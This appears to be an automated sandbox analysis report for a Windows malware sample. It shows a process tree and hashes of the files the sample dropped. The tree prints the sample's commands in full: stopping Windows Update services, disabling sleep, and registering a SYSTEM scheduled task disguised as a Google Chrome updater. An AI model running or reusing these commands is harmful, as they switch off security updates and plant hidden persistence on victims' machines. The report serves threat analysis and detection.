C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:3528
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3400
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1532
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2436
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4692
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:5060
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:4672
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:2476
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:3432
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:1544
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:2952
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rxejhfcm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:4756
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:2084
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:748
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:3856
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9.9MB
MD56fa2a8de3fc30b9c80d12c2ac4ad2e3f
SHA132fd7a00979b4ec01c031fdfbf12677529e6c4fa
SHA256a2c59381ca2fdba45f345eec78681fc417271e2f3fb65ff9ec06998d90abc9fd
SHA5129c51ac0abcab4b8e40b476dbb8e7aaff7a6057caf07756a1a846193bf9d4924fbe0f3f0847237029ecb6f840f658eb41fe43bb89dc7c74be6727c3ee12fe953e
-
Filesize
9.9MB
MD56fa2a8de3fc30b9c80d12c2ac4ad2e3f
SHA132fd7a00979b4ec01c031fdfbf12677529e6c4fa
SHA256a2c59381ca2fdba45f345eec78681fc417271e2f3fb65ff9ec06998d90abc9fd
SHA5129c51ac0abcab4b8e40b476dbb8e7aaff7a6057caf07756a1a846193bf9d4924fbe0f3f0847237029ecb6f840f658eb41fe43bb89dc7c74be6727c3ee12fe953e
-
Filesize
5.9MB
MD5aa57f0d7a099773175006624cc891b29
SHA144598d94dac6e9c72ffe65f9e17cf77c2c73e6fe
SHA2566227df9ce53429b024cb2fa118a7a735ec1c048117cb1a46247e92f1b839814f
SHA512e0fff8e7d8de1dc5b3d84bdea90828f9739499183aabb11eb5b7600af132f8fa0569bc49d4ca21ec5df925482ec2149d0134a88a4e8a632cb0326444a6bc31b0
-
Filesize
5.9MB
MD5aa57f0d7a099773175006624cc891b29
SHA144598d94dac6e9c72ffe65f9e17cf77c2c73e6fe
SHA2566227df9ce53429b024cb2fa118a7a735ec1c048117cb1a46247e92f1b839814f
SHA512e0fff8e7d8de1dc5b3d84bdea90828f9739499183aabb11eb5b7600af132f8fa0569bc49d4ca21ec5df925482ec2149d0134a88a4e8a632cb0326444a6bc31b0
-
Filesize
5.9MB
MD5aa57f0d7a099773175006624cc891b29
SHA144598d94dac6e9c72ffe65f9e17cf77c2c73e6fe
SHA2566227df9ce53429b024cb2fa118a7a735ec1c048117cb1a46247e92f1b839814f
SHA512e0fff8e7d8de1dc5b3d84bdea90828f9739499183aabb11eb5b7600af132f8fa0569bc49d4ca21ec5df925482ec2149d0134a88a4e8a632cb0326444a6bc31b0
-
Filesize
5.9MB
MD5aa57f0d7a099773175006624cc891b29
SHA144598d94dac6e9c72ffe65f9e17cf77c2c73e6fe
SHA2566227df9ce53429b024cb2fa118a7a735ec1c048117cb1a46247e92f1b839814f
SHA512e0fff8e7d8de1dc5b3d84bdea90828f9739499183aabb11eb5b7600af132f8fa0569bc49d4ca21ec5df925482ec2149d0134a88a4e8a632cb0326444a6bc31b0
-
Filesize
13.9MB
MD50abca5a76379dc774f4c133a177cde59
SHA15c7c48d7f3fea2c5e5f950cf83492cda82fda838
SHA25659a16f9faf29768ed027a33dced3dc1cd61c4be814b59070b3ce79e34bb6b963
SHA512dd3176ce1e26992be85022a0a9825520496d20a3a7d09b44a4ddedc05511668411f16733efcb82f80f105fef94c2bfa59f9fe908ef281de65f585a1448b668c7
-
Filesize
13.9MB
MD50abca5a76379dc774f4c133a177cde59
SHA15c7c48d7f3fea2c5e5f950cf83492cda82fda838
SHA25659a16f9faf29768ed027a33dced3dc1cd61c4be814b59070b3ce79e34bb6b963
SHA512dd3176ce1e26992be85022a0a9825520496d20a3a7d09b44a4ddedc05511668411f16733efcb82f80f105fef94c2bfa59f9fe908ef281de65f585a1448b668c7
-
Filesize
13.9MB
MD50abca5a76379dc774f4c133a177cde59
SHA15c7c48d7f3fea2c5e5f950cf83492cda82fda838
SHA25659a16f9faf29768ed027a33dced3dc1cd61c4be814b59070b3ce79e34bb6b963
SHA512dd3176ce1e26992be85022a0a9825520496d20a3a7d09b44a4ddedc05511668411f16733efcb82f80f105fef94c2bfa59f9fe908ef281de65f585a1448b668c7
-
Filesize
9.9MB
MD56fa2a8de3fc30b9c80d12c2ac4ad2e3f
SHA132fd7a00979b4ec01c031fdfbf12677529e6c4fa
SHA256a2c59381ca2fdba45f345eec78681fc417271e2f3fb65ff9ec06998d90abc9fd
SHA5129c51ac0abcab4b8e40b476dbb8e7aaff7a6057caf07756a1a846193bf9d4924fbe0f3f0847237029ecb6f840f658eb41fe43bb89dc7c74be6727c3ee12fe953e
-
Filesize
9.9MB
MD56fa2a8de3fc30b9c80d12c2ac4ad2e3f
SHA132fd7a00979b4ec01c031fdfbf12677529e6c4fa
SHA256a2c59381ca2fdba45f345eec78681fc417271e2f3fb65ff9ec06998d90abc9fd
SHA5129c51ac0abcab4b8e40b476dbb8e7aaff7a6057caf07756a1a846193bf9d4924fbe0f3f0847237029ecb6f840f658eb41fe43bb89dc7c74be6727c3ee12fe953e
-
Filesize
9.9MB
MD56fa2a8de3fc30b9c80d12c2ac4ad2e3f
SHA132fd7a00979b4ec01c031fdfbf12677529e6c4fa
SHA256a2c59381ca2fdba45f345eec78681fc417271e2f3fb65ff9ec06998d90abc9fd
SHA5129c51ac0abcab4b8e40b476dbb8e7aaff7a6057caf07756a1a846193bf9d4924fbe0f3f0847237029ecb6f840f658eb41fe43bb89dc7c74be6727c3ee12fe953e
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
2KB
MD5f39d3c5975feb9c06ef0604241d49f4c
SHA10a4b0cbff8372154e2ee23df5f38b2a4917ff737
SHA2564407818257d34e1aeb8ca1676a2281652617ff96a28a3739d5564951f3975ccf
SHA512e516a03b4eebb84e134da53d567ca962a9b7d9039d34d4aead4bcabbc7c2a25fc3a5da50cd945bf9a7f88c445dd50298f6b25179feb99bccb8009fc7e4cc744a
-
Filesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
Filesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
Filesize
16KB
MD5cc0d493ffbd49825ad190f68dc298bc2
SHA1ed5f7844c90c8455ac2220fdd7d56d37f4061bac
SHA256f86c351278225249fb950f27bff2105659b6b257471a721d87f3833b3c80b9ce
SHA51271aa97deff0cd4d9f0467336bf0d323bfed4814ef704f135c451dc195d43c0c049108d8eb4edd9512cd97e5172a4a51dbb503fe4168b8abf76e83dd754cccb16
-
Filesize
944B
MD5a6685e02d4224799097fe9c6627fb607
SHA1ec2d18e25513a559eed359a82c0d99e81ff41d54
SHA256a5090285f71bb4d53010b60b446726b9257b54271c6f2e7d708ec78e335e15a9
SHA5125e3111b2bcd3020d00d793ae3df269737ac3648d6374e18629860c455a023700f53effbc31bd3d6b5f359811de0f51a38eda248e5fd652675e6337b18cf2969e
-
Filesize
15KB
MD5ec42654a9f0be1ebe4a46463f7f45006
SHA1d86dc640e167a0e3ffc0589b5fbb477abefd6eb5
SHA256ff45e61a5c06feeab456460d90a71a15e0f062f983b2b4a0f153e2b4a88ddbca
SHA5122c9957c34491983fbc0fb22d9e31ce88ce4c0f4763da9c04902f36f863b18994f8618dd24174cbf7ec3f0827b4b56913a37463fb94fdb4bba9a7e2b11f7eaacd
-
Filesize
15KB
MD5ec42654a9f0be1ebe4a46463f7f45006
SHA1d86dc640e167a0e3ffc0589b5fbb477abefd6eb5
SHA256ff45e61a5c06feeab456460d90a71a15e0f062f983b2b4a0f153e2b4a88ddbca
SHA5122c9957c34491983fbc0fb22d9e31ce88ce4c0f4763da9c04902f36f863b18994f8618dd24174cbf7ec3f0827b4b56913a37463fb94fdb4bba9a7e2b11f7eaacd
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
309.4MB
MD52fa1f2c032aba5edf0e530b629314c3f
SHA1aaeadbdc478c1d66643923d7c09f1a6f92b31472
SHA25642861be44feeabc8e17b104b0185066f70c4b51e3ffcd8e0481cc30e7defa24a
SHA512287f668694c03e17fc10ce226d93173cd4795d1afcd8bd1b2d0a8f6c0aa22ef51e7c24eaf9e2f10213629b3a3d01630ecd1d1afa9d15284465739b644161229e
-
Filesize
315.5MB
MD567202fd00d6706bac286cacb89a731f2
SHA1107c69d2040fb1d8d767edaebaa2cc812923b4bc
SHA256b4f5a2207acdf6d7df5943ce5c4717513689f047cab90b61b628c482cae77f0b
SHA512272f49718637c12ccb946c2df8c5369e6373b83b086a7dee05b36a0df7e62c29dd398d485ac8d78419b1872712302afd04d4bcf83891f427ff9b402a0d1ad5ca
-
Filesize
42.2MB
MD5eda1f7b8b9e8a5e321eb42de3e09e898
SHA1c528c955638b56193d50f63040b7f2fbab63e4dc
SHA2569b5ef91505209976d717c11c6c68f3730e32c73bb64fa06b352de7c301a37cd1
SHA51240451e90f7e59400810a7e756578e0cb5bbb993263e1b3b52a04496d5acd55187458ecdc72cfa8bd6397b43d63d340844b3b26337b693dde26408a5457bc59fd
-
Filesize
40.5MB
MD56016ca40fe17dbac2539f422067acee6
SHA1848385fb90a545ae27813c01a15b7138ec0dead6
SHA2563aff954e8153ebc9d5c3c1cda87c424c71cc0a3005c499497be5ed06cc9a14be
SHA51299f3ba67dea7775feacd084b9a6df0d4974a10bc21c19636c4c2bf85575b193c99fd3f629c64867d1d956df25c2bd56f1445115d46e89faa5f64cfdca0aa0a72
-
Filesize
3KB
MD500930b40cba79465b7a38ed0449d1449
SHA14b25a89ee28b20ba162f23772ddaf017669092a5
SHA256eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5